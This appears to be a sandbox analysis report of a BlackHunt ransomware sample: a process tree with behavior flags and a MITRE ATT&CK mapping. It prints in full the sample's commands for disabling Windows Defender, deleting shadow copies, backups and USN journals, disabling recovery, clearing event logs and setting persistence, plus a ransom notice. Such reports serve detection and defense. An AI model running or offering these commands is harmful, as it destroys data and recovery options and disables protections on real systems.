  C:\Windows\System32\cmd.exe (PID 4772): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 4408): reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
      - Adds Run key to start application
  C:\Windows\System32\cmd.exe (PID 3176): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 5048): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 1404): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 3944): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      - Modifies Windows Defender Real-time Protection settings
  C:\Windows\System32\cmd.exe (PID 4744): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1428): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f
  C:\Windows\System32\cmd.exe (PID 532): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 4004): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 3052): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
    C:\Windows\system32\reg.exe (PID 1796): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 1536): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 3352): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 2828): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2408): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 3048): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 2760): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
  C:\Windows\System32\cmd.exe (PID 4436): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 4180): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 3768): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 860): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 384): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 3248): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4280): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 3432): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 2692): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 4800): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4820): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2052): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 1596): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 3320): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 820): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2900): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 1036): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2548): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 5088): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 4516): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 1256): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 2952): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4832): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 4064): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 3468): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 3912): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 3696): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 4232): reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4068): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 6912): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4392): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (PID 7948): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
  C:\Windows\System32\cmd.exe (PID 4932): "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe" /F
    - Modifies registry class
    C:\Windows\system32\schtasks.exe (PID 4632): SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe" /F
      - Creates scheduled task(s)
  C:\Windows\System32\cmd.exe (PID 4344): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe (PID 7732): vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 1968): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    C:\Windows\system32\vssadmin.exe (PID 7684): vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 1504): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
    C:\Windows\system32\vssadmin.exe (PID 7768): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 2452): "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    C:\Windows\system32\vssadmin.exe (PID 6992): vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      - Enumerates connected drives
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 3180): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe (PID 7724): vssadmin.exe Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 4864): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    C:\Windows\system32\bcdedit.exe (PID 7900): bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe (PID 4664): "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    C:\Windows\System32\Conhost.exe (PID 4436): \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\schtasks.exe (PID 5512): schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
  C:\Windows\System32\cmd.exe (PID 2476): "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    C:\Windows\system32\wbadmin.exe (PID 1488): wbadmin.exe delete catalog -quiet
      - Deletes backup catalog
  C:\Windows\System32\cmd.exe (PID 1340): "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    C:\Windows\system32\fsutil.exe (PID 8440): fsutil.exe usn deletejournal /D C:
      - Deletes NTFS Change Journal
  C:\Windows\System32\cmd.exe (PID 3052): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\bcdedit.exe (PID 5192): bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe (PID 8432): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
    C:\Windows\system32\fsutil.exe (PID 15320): fsutil usn deletejournal /D F:\
      - Enumerates connected drives
  C:\Windows\System32\cmd.exe (PID 5376): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
    C:\Windows\system32\fsutil.exe (PID 9144): fsutil usn deletejournal /D C:\
  C:\Windows\System32\cmd.exe (PID 8316): "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
    C:\Windows\system32\fsutil.exe (PID 7716): fsutil usn deletejournal /D M:\
      - Enumerates connected drives
  C:\Windows\System32\cmd.exe (PID 15852): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
    C:\Windows\system32\wevtutil.exe (PID 5296): wevtutil.exe cl Setup
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 16620): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
    C:\Windows\system32\wevtutil.exe (PID 5976): wevtutil.exe cl Application
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 8932): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
    C:\Windows\system32\wevtutil.exe (PID 6076): wevtutil.exe cl System
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 16448): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
    C:\Windows\system32\wevtutil.exe (PID 3400): wevtutil.exe cl Security
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 9928): "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
    C:\Windows\system32\wevtutil.exe (PID 5416): wevtutil.exe cl Security /e:false
      - Clears Windows event logs
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 10172): "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
    C:\Windows\system32\vssadmin.exe (PID 16396): vssadmin.exe Delete Shadows /all /quiet
      - Interacts with shadow copies
  C:\Windows\System32\cmd.exe (PID 8096): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
    C:\Windows\system32\bcdedit.exe (PID 7944): bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe (PID 452): "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    C:\Windows\system32\bcdedit.exe (PID 8132): bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      - Modifies boot configuration data using bcdedit
  C:\Windows\System32\cmd.exe (PID 820): "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
    C:\Windows\system32\fsutil.exe (PID 7844): fsutil.exe usn deletejournal /D C:
      - Deletes NTFS Change Journal
  C:\Windows\System32\cmd.exe (PID 6612): "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
    C:\Windows\system32\wbadmin.exe (PID 7264): wbadmin.exe delete catalog -quiet
      - Deletes backup catalog
  C:\Windows\System32\cmd.exe (PID 8180): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
    C:\Windows\system32\reg.exe (PID 10236): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
  C:\Windows\System32\cmd.exe (PID 8124): "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
    C:\Windows\system32\reg.exe (PID 5860): REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
  C:\Windows\System32\cmd.exe (PID 11468): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (PID 16480): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
  C:\Windows\System32\cmd.exe (PID 7908): "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
    C:\Windows\system32\schtasks.exe (PID 5912): SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
  C:\Windows\System32\cmd.exe (PID 16400): "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
    C:\Windows\system32\taskkill.exe (PID 16532): taskkill /IM mshta.exe /f
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\cmd.exe (PID 17060): "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
    - Checks computer location settings
    - Modifies registry class
    C:\Windows\SysWOW64\mshta.exe (PID 16656): "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      C:\Windows\SysWOW64\WerFault.exe (PID 17024): C:\Windows\SysWOW64\WerFault.exe -u -p 16656 -s 1456
        - Program crash
  C:\Windows\System32\cmd.exe (PID 6588): "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
    C:\Windows\system32\notepad.exe (PID 6584): notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
  C:\Windows\SysWOW64\cmd.exe (PID 1512): "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\26afe6699a834e177013aee6fd7cb3e299e84176c6c8f99f7ba275198cc741a3.exe"
    C:\Windows\SysWOW64\PING.EXE (PID 8288): ping 127.0.0.1 -n 5
      - Runs ping.exe
  C:\Windows\System32\cmd.exe (PID 7540): "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (PID 16508): reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
  C:\Windows\System32\cmd.exe (PID 8032): "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
    C:\Windows\system32\schtasks.exe (PID 8284): schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\vssvc.exe (PID 5812): C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbengine.exe (PID 8116): "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\vdsldr.exe (PID 13428): C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe (PID 3440): C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)

C:\Windows\SysWOW64\WerFault.exe (PID 16912): C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 16656 -ip 16656
MITRE ATT&CK Enterprise v15 (technique name followed by the number of matching signatures)

Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)

Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)

Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
Downloads